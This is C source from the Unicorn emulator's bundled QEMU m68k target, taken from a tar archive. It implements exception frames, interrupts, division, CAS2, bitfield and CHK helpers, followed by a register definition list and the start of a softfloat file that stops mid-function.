License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" static void cf_rte(CPUM68KState *env) { uint32_t sp; uint32_t fmt; sp = env->aregs[7]; fmt = cpu_ldl_mmuidx_ra(env, sp, MMU_KERNEL_IDX, 0); env->pc = cpu_ldl_mmuidx_ra(env, sp + 4, MMU_KERNEL_IDX, 0); sp |= (fmt >> 28) & 3; env->aregs[7] = sp + 8; cpu_m68k_set_sr(env, fmt); } static void m68k_rte(CPUM68KState *env) { uint32_t sp; uint16_t fmt; uint16_t sr; sp = env->aregs[7]; throwaway: sr = cpu_lduw_mmuidx_ra(env, sp, MMU_KERNEL_IDX, 0); sp += 2; env->pc = cpu_ldl_mmuidx_ra(env, sp, MMU_KERNEL_IDX, 0); sp += 4; if (m68k_feature(env, M68K_FEATURE_QUAD_MULDIV)) { /* all except 68000 */ fmt = cpu_lduw_mmuidx_ra(env, sp, MMU_KERNEL_IDX, 0); sp += 2; switch (fmt >> 12) { case 0: break; case 1: env->aregs[7] = sp; cpu_m68k_set_sr(env, sr); goto throwaway; case 2: case 3: sp += 4; break; case 4: sp += 8; break; case 7: sp += 52; break; } } env->aregs[7] = sp; cpu_m68k_set_sr(env, sr); } static void cf_interrupt_all(CPUM68KState *env, int is_hw) { CPUState *cs = env_cpu(env); uint32_t sp; uint32_t sr; uint32_t fmt; uint32_t retaddr; uint32_t vector; fmt = 0; retaddr = env->pc; if (!is_hw) { switch (cs->exception_index) { case EXCP_RTE: /* Return from an exception. */ cf_rte(env); return; case EXCP_HALT_INSN: cs->halted = 1; cs->exception_index = EXCP_HLT; cpu_loop_exit(cs); return; } if (cs->exception_index >= EXCP_TRAP0 && cs->exception_index <= EXCP_TRAP15) { /* Move the PC after the trap instruction. */ retaddr += 2; } } vector = cs->exception_index << 2; sr = env->sr | cpu_m68k_get_ccr(env); fmt |= 0x40000000; fmt |= vector << 16; fmt |= sr; env->sr |= SR_S; if (is_hw) { env->sr = (env->sr & ~SR_I) | (env->pending_level << SR_I_SHIFT); env->sr &= ~SR_M; } m68k_switch_sp(env); sp = env->aregs[7]; fmt |= (sp & 3) << 28; /* ??? This could cause MMU faults. */ sp &= ~3; sp -= 4; cpu_stl_mmuidx_ra(env, sp, retaddr, MMU_KERNEL_IDX, 0); sp -= 4; cpu_stl_mmuidx_ra(env, sp, fmt, MMU_KERNEL_IDX, 0); env->aregs[7] = sp; /* Jump to vector. */ env->pc = cpu_ldl_mmuidx_ra(env, env->vbr + vector, MMU_KERNEL_IDX, 0); } static inline void do_stack_frame(CPUM68KState *env, uint32_t *sp, uint16_t format, uint16_t sr, uint32_t addr, uint32_t retaddr) { if (m68k_feature(env, M68K_FEATURE_QUAD_MULDIV)) { /* all except 68000 */ CPUState *cs = env_cpu(env); switch (format) { case 4: *sp -= 4; cpu_stl_mmuidx_ra(env, *sp, env->pc, MMU_KERNEL_IDX, 0); *sp -= 4; cpu_stl_mmuidx_ra(env, *sp, addr, MMU_KERNEL_IDX, 0); break; case 3: case 2: *sp -= 4; cpu_stl_mmuidx_ra(env, *sp, addr, MMU_KERNEL_IDX, 0); break; } *sp -= 2; cpu_stw_mmuidx_ra(env, *sp, (format << 12) + (cs->exception_index << 2), MMU_KERNEL_IDX, 0); } *sp -= 4; cpu_stl_mmuidx_ra(env, *sp, retaddr, MMU_KERNEL_IDX, 0); *sp -= 2; cpu_stw_mmuidx_ra(env, *sp, sr, MMU_KERNEL_IDX, 0); } static void m68k_interrupt_all(CPUM68KState *env, int is_hw) { CPUState *cs = env_cpu(env); uint32_t sp; uint32_t retaddr; uint32_t vector; uint16_t sr, oldsr; retaddr = env->pc; if (!is_hw) { switch (cs->exception_index) { case EXCP_RTE: /* Return from an exception. */ m68k_rte(env); return; case EXCP_TRAP0: case EXCP_TRAP0 + 1: case EXCP_TRAP0 + 2: case EXCP_TRAP0 + 3: case EXCP_TRAP0 + 4: case EXCP_TRAP0 + 5: case EXCP_TRAP0 + 6: case EXCP_TRAP0 + 7: case EXCP_TRAP0 + 8: case EXCP_TRAP0 + 9: case EXCP_TRAP0 + 10: case EXCP_TRAP0 + 11: case EXCP_TRAP0 + 12: case EXCP_TRAP0 + 13: case EXCP_TRAP0 + 14: case EXCP_TRAP15: /* Move the PC after the trap instruction. */ retaddr += 2; break; } } vector = cs->exception_index << 2; sr = env->sr | cpu_m68k_get_ccr(env); /* * MC68040UM/AD, chapter 9.3.10 */ /* "the processor first make an internal copy" */ oldsr = sr; /* "set the mode to supervisor" */ sr |= SR_S; /* "suppress tracing" */ sr &= ~SR_T; /* "sets the processor interrupt mask" */ if (is_hw) { sr |= (env->sr & ~SR_I) | (env->pending_level << SR_I_SHIFT); } cpu_m68k_set_sr(env, sr); sp = env->aregs[7]; sp &= ~1; if (cs->exception_index == EXCP_ACCESS) { if (env->mmu.fault) { cpu_abort(cs, "DOUBLE MMU FAULT\n"); } env->mmu.fault = true; /* push data 3 */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* push data 2 */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* push data 1 */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 1 / push data 0 */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 1 address */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 2 data */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 2 address */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 3 data */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 3 address */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, env->mmu.ar, MMU_KERNEL_IDX, 0); /* fault address */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, env->mmu.ar, MMU_KERNEL_IDX, 0); /* write back 1 status */ sp -= 2; cpu_stw_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 2 status */ sp -= 2; cpu_stw_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 3 status */ sp -= 2; cpu_stw_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* special status word */ sp -= 2; cpu_stw_mmuidx_ra(env, sp, env->mmu.ssw, MMU_KERNEL_IDX, 0); /* effective address */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, env->mmu.ar, MMU_KERNEL_IDX, 0); do_stack_frame(env, &sp, 7, oldsr, 0, retaddr); env->mmu.fault = false; } else if (cs->exception_index == EXCP_ADDRESS) { do_stack_frame(env, &sp, 2, oldsr, 0, retaddr); } else if (cs->exception_index == EXCP_ILLEGAL || cs->exception_index == EXCP_DIV0 || cs->exception_index == EXCP_CHK || cs->exception_index == EXCP_TRAPCC || cs->exception_index == EXCP_TRACE) { /* FIXME: addr is not only env->pc */ do_stack_frame(env, &sp, 2, oldsr, env->pc, retaddr); } else if (is_hw && oldsr & SR_M && cs->exception_index >= EXCP_SPURIOUS && cs->exception_index <= EXCP_INT_LEVEL_7) { do_stack_frame(env, &sp, 0, oldsr, 0, retaddr); oldsr = sr; env->aregs[7] = sp; cpu_m68k_set_sr(env, sr &= ~SR_M); sp = env->aregs[7] & ~1; do_stack_frame(env, &sp, 1, oldsr, 0, retaddr); } else { do_stack_frame(env, &sp, 0, oldsr, 0, retaddr); } env->aregs[7] = sp; /* Jump to vector. */ env->pc = cpu_ldl_mmuidx_ra(env, env->vbr + vector, MMU_KERNEL_IDX, 0); } static void do_interrupt_all(CPUM68KState *env, int is_hw) { if (m68k_feature(env, M68K_FEATURE_M68000)) { m68k_interrupt_all(env, is_hw); return; } cf_interrupt_all(env, is_hw); } void m68k_cpu_do_interrupt(CPUState *cs) { M68kCPU *cpu = M68K_CPU(cs); CPUM68KState *env = &cpu->env; do_interrupt_all(env, 0); } static inline void do_interrupt_m68k_hardirq(CPUM68KState *env) { do_interrupt_all(env, 1); } void m68k_cpu_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr) { M68kCPU *cpu = M68K_CPU(cs); CPUM68KState *env = &cpu->env; cpu_restore_state(cs, retaddr, true); if (m68k_feature(env, M68K_FEATURE_M68040)) { env->mmu.mmusr = 0; env->mmu.ssw |= M68K_ATC_040; /* FIXME: manage MMU table access error */ env->mmu.ssw &= ~M68K_TM_040; if (env->sr & SR_S) { /* SUPERVISOR */ env->mmu.ssw |= M68K_TM_040_SUPER; } if (access_type == MMU_INST_FETCH) { /* instruction or data */ env->mmu.ssw |= M68K_TM_040_CODE; } else { env->mmu.ssw |= M68K_TM_040_DATA; } env->mmu.ssw &= ~M68K_BA_SIZE_MASK; switch (size) { case 1: env->mmu.ssw |= M68K_BA_SIZE_BYTE; break; case 2: env->mmu.ssw |= M68K_BA_SIZE_WORD; break; case 4: env->mmu.ssw |= M68K_BA_SIZE_LONG; break; } if (access_type != MMU_DATA_STORE) { env->mmu.ssw |= M68K_RW_040; } env->mmu.ar = addr; cs->exception_index = EXCP_ACCESS; cpu_loop_exit(cs); } } bool m68k_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { M68kCPU *cpu = M68K_CPU(cs); CPUM68KState *env = &cpu->env; if (interrupt_request & CPU_INTERRUPT_HARD && ((env->sr & SR_I) >> SR_I_SHIFT) < env->pending_level) { /* * Real hardware gets the interrupt vector via an IACK cycle * at this point. Current emulated hardware doesn't rely on * this, so we provide/save the vector when the interrupt is * first signalled. */ cs->exception_index = env->pending_vector; do_interrupt_m68k_hardirq(env); return true; } return false; } static void raise_exception_ra(CPUM68KState *env, int tt, uintptr_t raddr) { CPUState *cs = env_cpu(env); cs->exception_index = tt; cpu_loop_exit_restore(cs, raddr); } static void raise_exception(CPUM68KState *env, int tt) { raise_exception_ra(env, tt, 0); } void HELPER(raise_exception)(CPUM68KState *env, uint32_t tt) { raise_exception(env, tt); } void HELPER(divuw)(CPUM68KState *env, int destr, uint32_t den) { uint32_t num = env->dregs[destr]; uint32_t quot, rem; if (den == 0) { raise_exception_ra(env, EXCP_DIV0, GETPC()); } quot = num / den; rem = num % den; env->cc_c = 0; /* always cleared, even if overflow */ if (quot > 0xffff) { env->cc_v = -1; /* * real 68040 keeps N and unset Z on overflow, * whereas documentation says "undefined" */ env->cc_z = 1; return; } env->dregs[destr] = deposit32(quot, 16, 16, rem); env->cc_z = (int16_t)quot; env->cc_n = (int16_t)quot; env->cc_v = 0; } void HELPER(divsw)(CPUM68KState *env, int destr, int32_t den) { int32_t num = env->dregs[destr]; uint32_t quot, rem; if (den == 0) { raise_exception_ra(env, EXCP_DIV0, GETPC()); } quot = num / den; rem = num % den; env->cc_c = 0; /* always cleared, even if overflow */ if (quot != (int16_t)quot) { env->cc_v = -1; /* nothing else is modified */ /* * real 68040 keeps N and unset Z on overflow, * whereas documentation says "undefined" */ env->cc_z = 1; return; } env->dregs[destr] = deposit32(quot, 16, 16, rem); env->cc_z = (int16_t)quot; env->cc_n = (int16_t)quot; env->cc_v = 0; } void HELPER(divul)(CPUM68KState *env, int numr, int regr, uint32_t den) { uint32_t num = env->dregs[numr]; uint32_t quot, rem; if (den == 0) { raise_exception_ra(env, EXCP_DIV0, GETPC()); } quot = num / den; rem = num % den; env->cc_c = 0; env->cc_z = quot; env->cc_n = quot; env->cc_v = 0; if (m68k_feature(env, M68K_FEATURE_CF_ISA_A)) { if (numr == regr) { env->dregs[numr] = quot; } else { env->dregs[regr] = rem; } } else { env->dregs[regr] = rem; env->dregs[numr] = quot; } } void HELPER(divsl)(CPUM68KState *env, int numr, int regr, int32_t den) { int32_t num = env->dregs[numr]; int32_t quot, rem; if (den == 0) { raise_exception_ra(env, EXCP_DIV0, GETPC()); } quot = num / den; rem = num % den; env->cc_c = 0; env->cc_z = quot; env->cc_n = quot; env->cc_v = 0; if (m68k_feature(env, M68K_FEATURE_CF_ISA_A)) { if (numr == regr) { env->dregs[numr] = quot; } else { env->dregs[regr] = rem; } } else { env->dregs[regr] = rem; env->dregs[numr] = quot; } } void HELPER(divull)(CPUM68KState *env, int numr, int regr, uint32_t den) { uint64_t num = deposit64(env->dregs[numr], 32, 32, env->dregs[regr]); uint64_t quot; uint32_t rem; if (den == 0) { raise_exception_ra(env, EXCP_DIV0, GETPC()); } quot = num / den; rem = num % den; env->cc_c = 0; /* always cleared, even if overflow */ if (quot > 0xffffffffULL) { env->cc_v = -1; /* * real 68040 keeps N and unset Z on overflow, * whereas documentation says "undefined" */ env->cc_z = 1; return; } env->cc_z = quot; env->cc_n = quot; env->cc_v = 0; /* * If Dq and Dr are the same, the quotient is returned. * therefore we set Dq last. */ env->dregs[regr] = rem; env->dregs[numr] = quot; } void HELPER(divsll)(CPUM68KState *env, int numr, int regr, int32_t den) { int64_t num = deposit64(env->dregs[numr], 32, 32, env->dregs[regr]); int64_t quot; int32_t rem; if (den == 0) { raise_exception_ra(env, EXCP_DIV0, GETPC()); } quot = num / den; rem = num % den; env->cc_c = 0; /* always cleared, even if overflow */ if (quot != (int32_t)quot) { env->cc_v = -1; /* * real 68040 keeps N and unset Z on overflow, * whereas documentation says "undefined" */ env->cc_z = 1; return; } env->cc_z = quot; env->cc_n = quot; env->cc_v = 0; /* * If Dq and Dr are the same, the quotient is returned. * therefore we set Dq last. */ env->dregs[regr] = rem; env->dregs[numr] = quot; } /* We're executing in a serial context -- no need to be atomic. */ void HELPER(cas2w)(CPUM68KState *env, uint32_t regs, uint32_t a1, uint32_t a2) { uint32_t Dc1 = extract32(regs, 9, 3); uint32_t Dc2 = extract32(regs, 6, 3); uint32_t Du1 = extract32(regs, 3, 3); uint32_t Du2 = extract32(regs, 0, 3); int16_t c1 = env->dregs[Dc1]; int16_t c2 = env->dregs[Dc2]; int16_t u1 = env->dregs[Du1]; int16_t u2 = env->dregs[Du2]; int16_t l1, l2; uintptr_t ra = GETPC(); l1 = cpu_lduw_data_ra(env, a1, ra); l2 = cpu_lduw_data_ra(env, a2, ra); if (l1 == c1 && l2 == c2) { cpu_stw_data_ra(env, a1, u1, ra); cpu_stw_data_ra(env, a2, u2, ra); } if (c1 != l1) { env->cc_n = l1; env->cc_v = c1; } else { env->cc_n = l2; env->cc_v = c2; } env->cc_op = CC_OP_CMPW; env->dregs[Dc1] = deposit32(env->dregs[Dc1], 0, 16, l1); env->dregs[Dc2] = deposit32(env->dregs[Dc2], 0, 16, l2); } static void do_cas2l(CPUM68KState *env, uint32_t regs, uint32_t a1, uint32_t a2, bool parallel) { uint32_t Dc1 = extract32(regs, 9, 3); uint32_t Dc2 = extract32(regs, 6, 3); uint32_t Du1 = extract32(regs, 3, 3); uint32_t Du2 = extract32(regs, 0, 3); uint32_t c1 = env->dregs[Dc1]; uint32_t c2 = env->dregs[Dc2]; uint32_t u1 = env->dregs[Du1]; uint32_t u2 = env->dregs[Du2]; uint32_t l1, l2; uintptr_t ra = GETPC(); #if defined(CONFIG_ATOMIC64) int mmu_idx = cpu_mmu_index(env, 0); TCGMemOpIdx oi; #endif if (parallel) { /* We're executing in a parallel context -- must be atomic. */ #ifdef CONFIG_ATOMIC64 uint64_t c, u, l; if ((a1 & 7) == 0 && a2 == a1 + 4) { c = deposit64(c2, 32, 32, c1); u = deposit64(u2, 32, 32, u1); oi = make_memop_idx(MO_BEQ, mmu_idx); l = helper_atomic_cmpxchgq_be_mmu(env, a1, c, u, oi, ra); l1 = l >> 32; l2 = l; } else if ((a2 & 7) == 0 && a1 == a2 + 4) { c = deposit64(c1, 32, 32, c2); u = deposit64(u1, 32, 32, u2); oi = make_memop_idx(MO_BEQ, mmu_idx); l = helper_atomic_cmpxchgq_be_mmu(env, a2, c, u, oi, ra); l2 = l >> 32; l1 = l; } else #endif { /* Tell the main loop we need to serialize this insn. */ cpu_loop_exit_atomic(env_cpu(env), ra); } } else { /* We're executing in a serial context -- no need to be atomic. */ l1 = cpu_ldl_data_ra(env, a1, ra); l2 = cpu_ldl_data_ra(env, a2, ra); if (l1 == c1 && l2 == c2) { cpu_stl_data_ra(env, a1, u1, ra); cpu_stl_data_ra(env, a2, u2, ra); } } if (c1 != l1) { env->cc_n = l1; env->cc_v = c1; } else { env->cc_n = l2; env->cc_v = c2; } env->cc_op = CC_OP_CMPL; env->dregs[Dc1] = l1; env->dregs[Dc2] = l2; } void HELPER(cas2l)(CPUM68KState *env, uint32_t regs, uint32_t a1, uint32_t a2) { do_cas2l(env, regs, a1, a2, false); } void HELPER(cas2l_parallel)(CPUM68KState *env, uint32_t regs, uint32_t a1, uint32_t a2) { do_cas2l(env, regs, a1, a2, true); } struct bf_data { uint32_t addr; uint32_t bofs; uint32_t blen; uint32_t len; }; static struct bf_data bf_prep(uint32_t addr, int32_t ofs, uint32_t len) { int bofs, blen; /* Bound length; map 0 to 32. */ len = ((len - 1) & 31) + 1; /* Note that ofs is signed. */ addr += ofs / 8; bofs = ofs % 8; if (bofs < 0) { bofs += 8; addr -= 1; } /* * Compute the number of bytes required (minus one) to * satisfy the bitfield. */ blen = (bofs + len - 1) / 8; /* * Canonicalize the bit offset for data loaded into a 64-bit big-endian * word. For the cases where BLEN is not a power of 2, adjust ADDR so * that we can use the next power of two sized load without crossing a * page boundary, unless the field itself crosses the boundary. */ switch (blen) { case 0: bofs += 56; break; case 1: bofs += 48; break; case 2: if (addr & 1) { bofs += 8; addr -= 1; } /* fallthru */ case 3: bofs += 32; break; case 4: if (addr & 3) { bofs += 8 * (addr & 3); addr &= -4; } break; default: g_assert_not_reached(); } return (struct bf_data){ .addr = addr, .bofs = bofs, .blen = blen, .len = len, }; } static uint64_t bf_load(CPUM68KState *env, uint32_t addr, int blen, uintptr_t ra) { switch (blen) { case 0: return cpu_ldub_data_ra(env, addr, ra); case 1: return cpu_lduw_data_ra(env, addr, ra); case 2: case 3: return cpu_ldl_data_ra(env, addr, ra); case 4: return cpu_ldq_data_ra(env, addr, ra); default: // g_assert_not_reached(); return 0; } } static void bf_store(CPUM68KState *env, uint32_t addr, int blen, uint64_t data, uintptr_t ra) { switch (blen) { case 0: cpu_stb_data_ra(env, addr, data, ra); break; case 1: cpu_stw_data_ra(env, addr, data, ra); break; case 2: case 3: cpu_stl_data_ra(env, addr, data, ra); break; case 4: cpu_stq_data_ra(env, addr, data, ra); break; default: g_assert_not_reached(); } } uint32_t HELPER(bfexts_mem)(CPUM68KState *env, uint32_t addr, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); return (int64_t)(data << d.bofs) >> (64 - d.len); } uint64_t HELPER(bfextu_mem)(CPUM68KState *env, uint32_t addr, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); /* * Put CC_N at the top of the high word; put the zero-extended value * at the bottom of the low word. */ data <<= d.bofs; data >>= 64 - d.len; data |= data << (64 - d.len); return data; } uint32_t HELPER(bfins_mem)(CPUM68KState *env, uint32_t addr, uint32_t val, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); #ifdef _MSC_VER uint64_t mask = 0xffffffffffffffffULL << (64 - d.len) >> d.bofs; #else uint64_t mask = -1ull << (64 - d.len) >> d.bofs; #endif data = (data & ~mask) | (((uint64_t)val << (64 - d.len)) >> d.bofs); bf_store(env, d.addr, d.blen, data, ra); /* The field at the top of the word is also CC_N for CC_OP_LOGIC. */ return val << (32 - d.len); } uint32_t HELPER(bfchg_mem)(CPUM68KState *env, uint32_t addr, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); #ifdef _MSC_VER uint64_t mask = 0xffffffffffffffffULL << (64 - d.len) >> d.bofs; #else uint64_t mask = -1ull << (64 - d.len) >> d.bofs; #endif bf_store(env, d.addr, d.blen, data ^ mask, ra); return ((data & mask) << d.bofs) >> 32; } uint32_t HELPER(bfclr_mem)(CPUM68KState *env, uint32_t addr, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); #ifdef _MSC_VER uint64_t mask = 0xffffffffffffffffULL << (64 - d.len) >> d.bofs; #else uint64_t mask = -1ull << (64 - d.len) >> d.bofs; #endif bf_store(env, d.addr, d.blen, data & ~mask, ra); return ((data & mask) << d.bofs) >> 32; } uint32_t HELPER(bfset_mem)(CPUM68KState *env, uint32_t addr, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); #ifdef _MSC_VER uint64_t mask = 0xffffffffffffffffULL << (64 - d.len) >> d.bofs; #else uint64_t mask = -1ull << (64 - d.len) >> d.bofs; #endif bf_store(env, d.addr, d.blen, data | mask, ra); return ((data & mask) << d.bofs) >> 32; } uint32_t HELPER(bfffo_reg)(uint32_t n, uint32_t ofs, uint32_t len) { return (n ? clz32(n) : len) + ofs; } uint64_t HELPER(bfffo_mem)(CPUM68KState *env, uint32_t addr, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); #ifdef _MSC_VER uint64_t mask = 0xffffffffffffffffULL << (64 - d.len) >> d.bofs; #else uint64_t mask = -1ull << (64 - d.len) >> d.bofs; #endif uint64_t n = (data & mask) << d.bofs; uint32_t ffo = helper_bfffo_reg(n >> 32, ofs, d.len); /* * Return FFO in the low word and N in the high word. * Note that because of MASK and the shift, the low word * is already zero. */ return n | ffo; } void HELPER(chk)(CPUM68KState *env, int32_t val, int32_t ub) { /* * From the specs: * X: Not affected, C,V,Z: Undefined, * N: Set if val < 0; cleared if val > ub, undefined otherwise * We implement here values found from a real MC68040: * X,V,Z: Not affected * N: Set if val < 0; cleared if val >= 0 * C: if 0 <= ub: set if val < 0 or val > ub, cleared otherwise * if 0 > ub: set if val > ub and val < 0, cleared otherwise */ env->cc_n = val; env->cc_c = 0 <= ub ? val < 0 || val > ub : val > ub && val < 0; if (val < 0 || val > ub) { CPUState *cs = env_cpu(env); /* Recover PC and CC_OP for the beginning of the insn. */ cpu_restore_state(cs, GETPC(), true); /* flags have been modified by gen_flush_flags() */ env->cc_op = CC_OP_FLAGS; /* Adjust PC to end of the insn. */ env->pc += 2; cs->exception_index = EXCP_CHK; cpu_loop_exit(cs); } } void HELPER(chk2)(CPUM68KState *env, int32_t val, int32_t lb, int32_t ub) { /* * From the specs: * X: Not affected, N,V: Undefined, * Z: Set if val is equal to lb or ub * C: Set if val < lb or val > ub, cleared otherwise * We implement here values found from a real MC68040: * X,N,V: Not affected * Z: Set if val is equal to lb or ub * C: if lb <= ub: set if val < lb or val > ub, cleared otherwise * if lb > ub: set if val > ub and val < lb, cleared otherwise */ env->cc_z = val != lb && val != ub; env->cc_c = lb <= ub ? val < lb || val > ub : val > ub && val < lb; if (env->cc_c) { CPUState *cs = env_cpu(env); /* Recover PC and CC_OP for the beginning of the insn. */ cpu_restore_state(cs, GETPC(), true); /* flags have been modified by gen_flush_flags() */ env->cc_op = CC_OP_FLAGS; /* Adjust PC to end of the insn. */ env->pc += 4; cs->exception_index = EXCP_CHK; cpu_loop_exit(cs); } } �����������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/qregs.def������������������������������������������������������������0000664�0000000�0000000�00000000302�14675241067�0020022�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������DEFO32(PC, pc) DEFO32(SR, sr) DEFO32(CC_OP, cc_op) DEFO32(CC_X, cc_x) DEFO32(CC_C, cc_c) DEFO32(CC_N, cc_n) DEFO32(CC_V, cc_v) DEFO32(CC_Z, cc_z) DEFO32(MACSR, macsr) DEFO32(MAC_MASK, mac_mask) ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/softfloat.c����������������������������������������������������������0000664�0000000�0000000�00000323146�14675241067�0020404�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Ported from a work by Andreas Grabher for Previous, NeXT Computer Emulator, * derived from NetBSD M68040 FPSP functions, * derived from release 2a of the SoftFloat IEC/IEEE Floating-point Arithmetic * Package. Those parts of the code (and some later contributions) are * provided under that license, as detailed below. * It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * Any future contributions to this file will be taken to be licensed under * the Softfloat-2a license unless specifically indicated otherwise. */ /* * Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "softfloat.h" #include "fpu/softfloat-macros.h" #include "softfloat_fpsp_tables.h" #define pi_exp 0x4000 #define piby2_exp 0x3FFF #define pi_sig UINT64_C(0xc90fdaa22168c235) static floatx80 propagateFloatx80NaNOneArg(floatx80 a, float_status *status) { if (floatx80_is_signaling_nan(a, status)) { float_raise(float_flag_invalid, status); a = floatx80_silence_nan(a, status); } if (status->default_nan_mode) { return floatx80_default_nan(status); } return a; } /* * Returns the modulo remainder of the extended double-precision floating-point * value `a' with respect to the corresponding value `b'. */ floatx80 floatx80_mod(floatx80 a, floatx80 b, float_status *status) { flag aSign, zSign; int32_t aExp, bExp, expDiff; uint64_t aSig0, aSig1, bSig; uint64_t qTemp, term0, term1; aSig0 = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); bSig = extractFloatx80Frac(b); bExp = extractFloatx80Exp(b); if (aExp == 0x7FFF) { if ((uint64_t) (aSig0 << 1) || ((bExp == 0x7FFF) && (uint64_t) (bSig << 1))) { return propagateFloatx80NaN(a, b, status); } goto invalid; } if (bExp == 0x7FFF) { if ((uint64_t) (bSig << 1)) { return propagateFloatx80NaN(a, b, status); } return a; } if (bExp == 0) { if (bSig == 0) { invalid: float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } normalizeFloatx80Subnormal(bSig, &bExp, &bSig); } if (aExp == 0) { if ((uint64_t) (aSig0 << 1) == 0) { return a; } normalizeFloatx80Subnormal(aSig0, &aExp, &aSig0); } bSig |= UINT64_C(0x8000000000000000); zSign = aSign; expDiff = aExp - bExp; aSig1 = 0; if (expDiff < 0) { return a; } qTemp = (bSig <= aSig0); if (qTemp) { aSig0 -= bSig; } expDiff -= 64; while (0 < expDiff) { qTemp = estimateDiv128To64(aSig0, aSig1, bSig); qTemp = (2 < qTemp) ? qTemp - 2 : 0; mul64To128(bSig, qTemp, &term0, &term1); sub128(aSig0, aSig1, term0, term1, &aSig0, &aSig1); shortShift128Left(aSig0, aSig1, 62, &aSig0, &aSig1); expDiff -= 62; } expDiff += 64; if (0 < expDiff) { qTemp = estimateDiv128To64(aSig0, aSig1, bSig); qTemp = (2 < qTemp) ? qTemp - 2 : 0; qTemp >>= 64 - expDiff; mul64To128(bSig, qTemp << (64 - expDiff), &term0, &term1); sub128(aSig0, aSig1, term0, term1, &aSig0, &aSig1); shortShift128Left(0, bSig, 64 - expDiff, &term0, &term1); while (le128(term0, term1, aSig0, aSig1)) { ++qTemp; sub128(aSig0, aSig1, term0, term1, &aSig0, &aSig1); } } return normalizeRoundAndPackFloatx80( 80, zSign, bExp + expDiff, aSig0, aSig1, status); } /* * Returns the mantissa of the extended double-precision floating-point * value `a'. */ floatx80 floatx80_getman(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a , status); } float_raise(float_flag_invalid , status); return floatx80_default_nan(status); } if (aExp == 0) { if (aSig == 0) { return packFloatx80(aSign, 0, 0); } normalizeFloatx80Subnormal(aSig, &aExp, &aSig); } return roundAndPackFloatx80(status->floatx80_rounding_precision, aSign, 0x3FFF, aSig, 0, status); } /* * Returns the exponent of the extended double-precision floating-point * value `a' as an extended double-precision value. */ floatx80 floatx80_getexp(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a , status); } float_raise(float_flag_invalid , status); return floatx80_default_nan(status); } if (aExp == 0) { if (aSig == 0) { return packFloatx80(aSign, 0, 0); } normalizeFloatx80Subnormal(aSig, &aExp, &aSig); } return int32_to_floatx80(aExp - 0x3FFF, status); } /* * Scales extended double-precision floating-point value in operand `a' by * value `b'. The function truncates the value in the second operand 'b' to * an integral value and adds that value to the exponent of the operand 'a'. * The operation performed according to the IEC/IEEE Standard for Binary * Floating-Point Arithmetic. */ floatx80 floatx80_scale(floatx80 a, floatx80 b, float_status *status) { flag aSign, bSign; int32_t aExp, bExp, shiftCount; 